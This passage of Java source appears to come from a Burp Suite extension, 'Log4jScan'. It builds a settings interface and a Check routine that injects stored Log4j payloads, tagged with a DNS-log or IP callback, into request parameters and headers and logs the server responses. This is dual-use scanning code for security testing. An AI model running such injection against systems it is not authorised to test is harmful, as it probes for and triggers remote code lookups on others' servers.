isCheckHeader; // 是否检测header\n private static boolean isCheckParam; // 是否检测参数\n private static boolean isDnsOrIp; // 是否是dns或者ip\n private static boolean isCheckWhiteList; // 是否检测白名单\n private static Set log4jPayload = new LinkedHashSet<>(); // 存储log4j payload\n private static List payloadList = new ArrayList<>(); // payload列表\n private static List domainList = new ArrayList<>(); // 白名单域名\n private static List headerList = new ArrayList<>(); // header列表\n public static String dns;\n public static String ip;\n private static final Lock lock = new ReentrantLock();\n \n public static void resetAllCaches() {\n urlHashList.clear();\n parameterList.clear();\n UrlCacheUtil.resetCache(\"log4j\");\n }\n\n\n @Override\n public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse iHttpRequestResponse) {\n if (isPassiveScan && toolFlag == IBurpExtenderCallbacks.TOOL_PROXY && !messageIsRequest) {\n synchronized (log4jlog) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n Check(new IHttpRequestResponse[]{iHttpRequestResponse},false);\n }\n });\n thread.start();\n }\n }\n }\n\n @Override\n public IHttpService getHttpService() {\n return currentlyDisplayedItem.getHttpService();\n }\n\n @Override\n public byte[] getRequest() {\n return currentlyDisplayedItem.getRequest();\n }\n\n @Override\n public byte[] getResponse() {\n return currentlyDisplayedItem.getResponse();\n }\n\n @Override\n public void init() {\n\n // 存储白名单域名\n List domain = getLog4jListsByType(\"domain\");\n // 将domain转为List\n for (Log4jBean log4jBean : domain) {\n domainList.add(log4jBean.getValue());\n }\n\n dns = getConfig(\"config\", \"dnslog\").getValue();\n ip = getConfig(\"config\", \"ip\").getValue();\n\n setupUI();\n setupData();\n }\n\n // 初始化数据\n private void setupData() {\n\n // 被动扫描选择框\n passiveScanCheckBox.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n if (passiveScanCheckBox.isSelected()) {\n isPassiveScan = true;\n } else {\n isPassiveScan = false;\n }\n }\n });\n // 原始payload值选择框\n originalValueCheckBox.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n if (originalValueCheckBox.isSelected()) {\n isOriginalValue = true;\n } else {\n isOriginalValue = false;\n }\n }\n });\n // 检测header选择框\n checkHeaderCheckBox.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n if (checkHeaderCheckBox.isSelected()) {\n isCheckHeader = true;\n } else {\n isCheckHeader = false;\n }\n }\n });\n // 检测参数选择框\n checkParmamCheckBox.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n if (checkParmamCheckBox.isSelected()) {\n isCheckParam = true;\n } else {\n isCheckParam = false;\n }\n }\n });\n // 是否是dns或者ip选择框\n isDnsOrIpCheckBox.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n dns = getConfig(\"config\", \"dnslog\").getValue();\n ip = getConfig(\"config\", \"ip\").getValue();\n if (isDnsOrIpCheckBox.isSelected()) {\n isDnsOrIp = true;\n isDnsOrIpCheckBox.setText(\"DNS\");\n } else {\n isDnsOrIp = false;\n isDnsOrIpCheckBox.setText(\"IP\");\n }\n }\n });\n\n // 初始化白名单输入框\n List domain = getLog4jListsByType(\"domain\");\n for (Log4jBean log4jBean : domain) {\n whiteListTextArea.setText(whiteListTextArea.getText() + log4jBean.getValue() + \"\\n\");\n domainList.add(log4jBean.getValue());\n }\n // 初始化header输入框\n List header = getLog4jListsByType(\"header\");\n for (Log4jBean log4jBean : header) {\n headerTextArea.setText(headerTextArea.getText() + log4jBean.getValue() + \"\\n\");\n headerList.add(log4jBean.getValue());\n }\n // 初始化payload输入框\n List payload = getLog4jListsByType(\"payload\");\n for (Log4jBean log4jBean : payload) {\n payloadTextArea.setText(payloadTextArea.getText() + log4jBean.getValue() + \"\\n\");\n payloadList.add(log4jBean.getValue());\n }\n\n // 检测白名单选择框\n checkWhiteListCheckBox.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n if (checkWhiteListCheckBox.isSelected()) {\n isCheckWhiteList = true;\n } else {\n isCheckWhiteList = false;\n }\n }\n });\n // 保存白名单域名按钮\n saveWhiteListButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n String whiteListTextAreaText = whiteListTextArea.getText();\n deleteLog4jByType(\"domain\");\n // 如果包含换行符,就分割成多个domain\n if (whiteListTextAreaText.contains(\"\\n\")) {\n String[] split = whiteListTextAreaText.split(\"\\n\");\n for (String s : split) {\n Log4jBean log4jBean = new Log4jBean(\"domain\", s);\n saveLog4j(log4jBean);\n }\n } else {\n Log4jBean log4jBean = new Log4jBean(\"domain\", whiteListTextAreaText);\n saveLog4j(log4jBean);\n }\n // 存储白名单域名\n List domain = getLog4jListsByType(\"domain\");\n // 将domain转为List\n for (Log4jBean log4jBean : domain) {\n domainList.add(log4jBean.getValue());\n }\n whiteListTextArea.updateUI();\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.save_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n // 保存header按钮\n saveHeaderListButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n String headerTextAreaText = headerTextArea.getText();\n deleteLog4jByType(\"header\");\n String[] split = headerTextAreaText.split(\"\\n\");\n for (String s : split) {\n Log4jBean log4jBean = new Log4jBean(\"header\", s);\n saveLog4j(log4jBean);\n }\n List header = getLog4jListsByType(\"header\");\n for (Log4jBean log4jBean : header) {\n headerList.add(log4jBean.getValue());\n }\n headerTextArea.updateUI();\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.save_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n // 保存payload按钮\n savePayloadButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n String payloadTextAreaText = payloadTextArea.getText();\n deleteLog4jByType(\"payload\");\n String[] split = payloadTextAreaText.split(\"\\n\");\n for (String s : split) {\n Log4jBean log4jBean = new Log4jBean(\"payload\", s);\n saveLog4j(log4jBean);\n }\n List payload = getLog4jListsByType(\"payload\");\n for (Log4jBean log4jBean : payload) {\n payloadList.add(log4jBean.getValue());\n }\n\n\n payloadTextArea.updateUI();\n JOptionPane.showMessageDialog(null, I18nUtils.get(\"config.message.save_success\"), I18nUtils.get(\"config.title.info\"), JOptionPane.INFORMATION_MESSAGE);\n }\n });\n // 刷新表格\n refreshTableButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n log4jtable.updateUI();\n }\n });\n\n // 清空表格\n clearTableButton.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n log4jlog.clear();\n HRequestTextEditor.setMessage(new byte[0], true);\n HResponseTextEditor.setMessage(new byte[0], false);\n urlHashList.clear();\n UrlCacheUtil.resetCache(\"log4j\"); // 清空URL缓存\n log4jtable.updateUI();\n }\n });\n\n }\n\n // 初始化UI\n private void setupUI() {\n // 注册被动扫描监听器\n Utils.callbacks.registerHttpListener(this);\n panel = new JPanel();\n panel.setLayout(new BorderLayout());\n\n JPanel splitPane = new JPanel(new BorderLayout());\n // 左边的面板\n // 左边的上下按7:3分割\n JSplitPane leftSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);\n leftSplitPane.setResizeWeight(0.7);\n leftSplitPane.setDividerLocation(0.7);\n // 左边的上面是表格\n urltablescrollpane = new JScrollPane();\n log4jtable = new URLTable(new Log4jModel());\n urltablescrollpane.setViewportView(log4jtable);\n leftSplitPane.setTopComponent(urltablescrollpane);\n\n\n\n // 左边的下面是消息编辑器\n tabbedPanereq = new JTabbedPane();\n tabbedPaneresp = new JTabbedPane();\n HRequestTextEditor = Utils.callbacks.createMessageEditor(this, false);\n HResponseTextEditor = Utils.callbacks.createMessageEditor(this, false);\n tabbedPanereq.addTab(\"Request\", HRequestTextEditor.getComponent());\n tabbedPaneresp.addTab(\"Response\", HResponseTextEditor.getComponent());\n JSplitPane leftDownSplitPane = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);\n leftDownSplitPane.setResizeWeight(0.5);\n leftDownSplitPane.setDividerLocation(0.5);\n leftDownSplitPane.setLeftComponent(tabbedPanereq);\n leftDownSplitPane.setRightComponent(tabbedPaneresp);\n leftSplitPane.setBottomComponent(leftDownSplitPane);\n\n\n // 右边的面板\n // 右边的上下按7:3分割\n JSplitPane rightSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);\n rightSplitPane.setResizeWeight(0.7);\n rightSplitPane.setDividerLocation(0.7);\n\n\n // 右边的上部分 - 重新设计布局\n // 添加被动扫描选择框\n passiveScanCheckBox = new JCheckBox(I18nUtils.get(\"log4j.checkbox.passive\"));\n // 添加删除原始值选择框\n originalValueCheckBox = new JCheckBox(I18nUtils.get(\"log4j.checkbox.original\"));\n // 添加检测cookie选择框\n checkParmamCheckBox = new JCheckBox(I18nUtils.get(\"log4j.checkbox.params\"));\n // 添加检测header选择框\n checkHeaderCheckBox = new JCheckBox(I18nUtils.get(\"log4j.checkbox.headers\"));\n // 添加白名单域名检测选择框\n checkWhiteListCheckBox = new JCheckBox(I18nUtils.get(\"log4j.checkbox.whitelist\"));\n isDnsOrIpCheckBox = new JCheckBox(I18nUtils.get(\"log4j.checkbox.dns_ip\"));\n // 白名单域名保存按钮\n saveWhiteListButton = new JButton(I18nUtils.get(\"log4j.button.save_whitelist\"));\n // 保存header按钮\n saveHeaderListButton = new JButton(I18nUtils.get(\"log4j.button.save_header\"));\n // 白名单域名输入框列表\n whiteListTextArea = new JTextArea(5,10);\n whiteListTextArea.setLineWrap(false); // 自动换行\n whiteListTextArea.setWrapStyleWord(false); // 按单词换行\n JScrollPane whiteListTextAreascrollPane = new JScrollPane(whiteListTextArea);\n\n // header检测数据框列表\n headerTextArea = new JTextArea(5,10);\n headerTextArea.setLineWrap(false); // 自动换行\n headerTextArea.setWrapStyleWord(false); // 按单词换行\n JScrollPane headerTextAreascrollPane = new JScrollPane(headerTextArea);\n // 刷新表格按钮\n refreshTableButton = new JButton(I18nUtils.get(\"log4j.button.refresh\"));\n // 清空表格按钮\n clearTableButton = new JButton(I18nUtils.get(\"log4j.button.clear\"));\n // 白名单域名label\n JLabel whiteDomainListLabel = new JLabel(I18nUtils.get(\"log4j.label.whitelist\"));\n // 检测header label\n JLabel headerLabel = new JLabel(I18nUtils.get(\"log4j.label.header\"));\n\n // 添加到右边的上部分 - 重新设计布局\n JPanel rightTopPanel = new JPanel();\n rightTopPanel.setLayout(new BorderLayout());\n rightTopPanel.setBorder(BorderFactory.createEmptyBorder(5, 5, 5, 5));\n\n // 创建扫描选项面板\n JPanel scanOptionsPanel = new JPanel();\n scanOptionsPanel.setLayout(new GridLayout(2, 3, 5, 5));\n scanOptionsPanel.setBorder(BorderFactory.createTitledBorder(I18nUtils.get(\"log4j.border.scan_options\")));\n scanOptionsPanel.add(passiveScanCheckBox);\n scanOptionsPanel.add(originalValueCheckBox);\n scanOptionsPanel.add(checkParmamCheckBox);\n scanOptionsPanel.add(checkHeaderCheckBox);\n scanOptionsPanel.add(checkWhiteListCheckBox);\n scanOptionsPanel.add(isDnsOrIpCheckBox);\n\n // 创建配置面板\n JPanel configPanel = new JPanel();\n configPanel.setLayout(new BorderLayout(5, 5));\n configPanel.setBorder(BorderFactory.createTitledBorder(I18nUtils.get(\"log4j.border.configuration\")));\n\n // 白名单域名配置\n JPanel whitelistPanel = new JPanel(new BorderLayout(5, 5));\n whitelistPanel.add(whiteDomainListLabel, BorderLayout.NORTH);\n whitelistPanel.add(whiteListTextAreascrollPane, BorderLayout.CENTER);\n JPanel whitelistButtonPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));\n whitelistButtonPanel.add(saveWhiteListButton);\n whitelistPanel.add(whitelistButtonPanel, BorderLayout.SOUTH);\n\n // Header检测配置\n JPanel headerPanel = new JPanel(new BorderLayout(5, 5));\n headerPanel.add(headerLabel, BorderLayout.NORTH);\n headerPanel.add(headerTextAreascrollPane, BorderLayout.CENTER);\n JPanel headerButtonPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));\n headerButtonPanel.add(saveHeaderListButton);\n headerPanel.add(headerButtonPanel, BorderLayout.SOUTH);\n\n // 将白名单和Header配置放入分割面板\n JSplitPane configSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);\n configSplitPane.setResizeWeight(0.5);\n configSplitPane.setDividerLocation(0.5);\n configSplitPane.setTopComponent(whitelistPanel);\n configSplitPane.setBottomComponent(headerPanel);\n configPanel.add(configSplitPane, BorderLayout.CENTER);\n\n // 创建操作按钮面板\n JPanel actionButtonsPanel = new JPanel(new FlowLayout(FlowLayout.LEFT, 5, 5));\n actionButtonsPanel.setBorder(BorderFactory.createTitledBorder(I18nUtils.get(\"log4j.border.actions\")));\n actionButtonsPanel.add(refreshTableButton);\n actionButtonsPanel.add(clearTableButton);\n\n // 将所有面板放入主面板\n JSplitPane mainRightSplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);\n mainRightSplitPane.setResizeWeight(0.3);\n mainRightSplitPane.setDividerLocation(0.3);\n mainRightSplitPane.setTopComponent(scanOptionsPanel);\n \n JPanel configAndActionsPanel = new JPanel(new BorderLayout(5, 5));\n configAndActionsPanel.add(configPanel, BorderLayout.CENTER);\n configAndActionsPanel.add(actionButtonsPanel, BorderLayout.SOUTH);\n mainRightSplitPane.setBottomComponent(configAndActionsPanel);\n \n rightTopPanel.add(mainRightSplitPane, BorderLayout.CENTER);\n\n rightSplitPane.setTopComponent(rightTopPanel);\n\n\n // 右边的下部分左边\n // log4j payload label\n JLabel PayloadLabel = new JLabel(I18nUtils.get(\"log4j.label.payload\"));\n // log4j payload输入框\n // log4j payload保存按钮\n payloadTextArea = new JTextArea(5,10);\n payloadTextArea.setLineWrap(false); // 自动换行\n payloadTextArea.setWrapStyleWord(false); // 按单词换行\n JScrollPane payloadTextAreascrollPane = new JScrollPane(payloadTextArea);\n savePayloadButton = new JButton(I18nUtils.get(\"log4j.button.save_payload\"));\n JPanel rightDownLeftPanel = new JPanel();\n rightDownLeftPanel.setLayout(new BorderLayout(5, 5));\n rightDownLeftPanel.setBorder(BorderFactory.createEmptyBorder(5, 5, 5, 5));\n rightDownLeftPanel.add(PayloadLabel, BorderLayout.NORTH);\n rightDownLeftPanel.add(payloadTextAreascrollPane, BorderLayout.CENTER);\n JPanel payloadButtonPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));\n payloadButtonPanel.add(savePayloadButton);\n rightDownLeftPanel.add(payloadButtonPanel, BorderLayout.SOUTH);\n\n\n // 左右分割面板添加rightDownLeftPanel和rightDownRightPanel\n JPanel rightDownPanel = new JPanel(new BorderLayout());\n rightDownPanel.add(rightDownLeftPanel, BorderLayout.CENTER);\n rightSplitPane.setBottomComponent(rightDownPanel);\n\n // 添加到splitPane\n splitPane.add(leftSplitPane, BorderLayout.CENTER);\n splitPane.add(rightSplitPane, BorderLayout.EAST);\n panel.add(splitPane, BorderLayout.CENTER);\n }\n\n @Override\n public JPanel getPanel(IBurpExtenderCallbacks callbacks) {\n return panel;\n }\n\n @Override\n public String getTabName() {\n return \"Log4jScan\";\n }\n // 添加数据\n public static void add(String extensionMethod, String url, String status, String res, IHttpRequestResponse baseRequestResponse) {\n synchronized (log4jlog) {\n int id = log4jlog.size();\n log4jlog.add(new Log4jEntry(id, extensionMethod, url, status, res, baseRequestResponse));\n log4jtable.updateUI();\n }\n\n }\n\n // 获取请求包的tag\n private static String getReqTag(IHttpRequestResponse baseRequestResponse, IRequestInfo req, String type) {\n // 获取并处理URI\n String uri = req.getHeaders().get(0).split(\" \")[1].split(\"\\\\?\")[0].replace(\"/\", \".\");\n\n // 如果URI超过25个字符,截取并处理结尾的点号\n if (uri.length() > 25) {\n uri = uri.substring(0, 25);\n if (uri.endsWith(\".\")) {\n uri = uri.substring(0, uri.length() - 1);\n }\n }\n\n // 处理URI末尾的点号\n if (uri.endsWith(\".\")) {\n uri = uri.substring(0, uri.length() - 1);\n }\n\n // 构建最终标签\n String tag = req.getMethod() + \".\" + baseRequestResponse.getHttpService().getHost() + uri;\n return \"dns\".equalsIgnoreCase(type) ? tag + \".\" : tag;\n }\n\n // 检测核心方法\n public static void Check(IHttpRequestResponse[] messageInfo, boolean isSend) {\n lock.lock();\n try{\n IHttpRequestResponse baseRequestResponse = messageInfo[0];\n IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);\n List reqheaders = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();\n String method = analyzeRequest.getMethod();\n String host = baseRequestResponse.getHttpService().getHost();\n URL rdurlURL = analyzeRequest.getUrl();\n String url = analyzeRequest.getUrl().toString();\n List paraLists = analyzeRequest.getParameters();\n\n // 如果method不是get或者post方式直接返回\n if (!method.equals(\"GET\") && !method.equals(\"POST\")) {\n return;\n }\n // url 中匹配为静态资源\n if (Utils.isUrlBlackListSuffix(url)){\n return;\n }\n // 如果没有开启检测参数和检测header 并且参数没有值 直接返回\n if (!isCheckParam && !isCheckHeader) {\n return;\n }\n\n // 判断参数类型,不符合的直接跳过检测\n boolean ruleHit = true; // 默认设置为true,表示命中规则\n for (IParameter para : paraLists) {\n if ((para.getType() == PARAM_URL || para.getType() == PARAM_BODY || para.getType() == PARAM_JSON)\n || isCheckHeader) {\n ruleHit = false; // 如果有 URL、BODY、JSON 参数或者开启了header 检测,则不命中规则\n break;\n }\n }\n if (ruleHit) {\n return; // 如果命中规则,则直接返回\n }\n\n\n // 如果不是手动发送则需要进行url去重\n if (!isSend) {\n if (!UrlCacheUtil.checkUrlUnique(\"log4j\", method, rdurlURL, paraLists)) {\n return;\n }\n }else {\n isCheckWhiteList = false;\n }\n\n if (isCheckWhiteList) {\n // 如果未匹配到 直接返回\n if (!Utils.isMatchDomainName(host,domainList)){\n return;\n }\n }\n // 加入payload前先清空列表\n log4jPayload.clear();\n // 将数据库中的payload加入到列表\n for (String log4j : payloadList) {\n if (isOriginalValue) {\n log4jPayload.add(log4j);\n } else {\n if (log4j.contains(\"dnslog-url\")) {\n if (isDnsOrIp) {\n String logPrefix = getReqTag(baseRequestResponse, analyzeRequest, \"dns\");\n // 新增:为log4j dnslog payload加前缀\n String log4jDnslogPayload = logPrefix + \"log4j.\" + dns;\n log4jPayload.add(log4j.replace(\"dnslog-url\", log4jDnslogPayload));\n } else {\n String logPrefix = getReqTag(baseRequestResponse, analyzeRequest, \"ip\");\n // 新增:为log4j ip payload加前缀\n String log4jIpPayload = ip + \"/log4j.\" + logPrefix;\n log4jPayload.add(log4j.replace(\"dnslog-url\", log4jIpPayload));\n }\n } else {\n log4jPayload.add(log4j);\n }\n }\n }\n\n // 检测参数\n if (isCheckParam) {\n for (IParameter para : paraLists) {\n if (para.getType() == PARAM_URL || para.getType() == PARAM_BODY || para.getType() == PARAM_JSON) {\n String paraName = para.getName();\n String paraValue = para.getValue();\n // 判断参数是否在url中\n if (para.getType() == PARAM_URL || para.getType() == PARAM_BODY) {\n for (String logPayload : log4jPayload) {\n // 如果是在get请求中,需要对payload进行url编码\n if (para.getType() == PARAM_URL) {\n logPayload = Utils.UrlEncode(logPayload);\n }\n IParameter iParameter = Utils.helpers.buildParameter(paraName, logPayload, para.getType());\n byte[] bytes = Utils.helpers.updateParameter(baseRequestResponse.getRequest(), iParameter);\n IHttpRequestResponse newRequestResponse = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), bytes);\n IResponseInfo analyzeResponse = Utils.helpers.analyzeResponse(newRequestResponse.getResponse());\n byte[] log4jresponseBody = newRequestResponse.getResponse();\n String ParamLength = \"\";\n String ParamstatusCode = String.valueOf(analyzeResponse.getStatusCode());\n if (log4jresponseBody != null) {\n // 判断有无Content-Length字段\n IResponseInfo ReqResponse = Utils.helpers.analyzeResponse(log4jresponseBody);\n List log4jHeaders = ReqResponse.getHeaders();\n String contentLength = HelperPlus.getHeaderValueOf(log4jHeaders, \"Content-Length\");\n if (contentLength != null){\n ParamLength = contentLength;\n }\n }\n if (ParamLength.isEmpty()) {\n assert log4jresponseBody != null;\n ParamLength = String.valueOf(log4jresponseBody.length);\n }\n add(method, url, ParamstatusCode, ParamLength, newRequestResponse);\n }\n\n }\n // 判断参数是否在json中\n if (para.getType() == PARAM_JSON) {\n for (String logPayload : log4jPayload) {\n String request_data = Utils.helpers.bytesToString(baseRequestResponse.getRequest()).split(\"\\r\\n\\r\\n\")[1];\n Map request_json = JSON.parseObject(request_data);\n List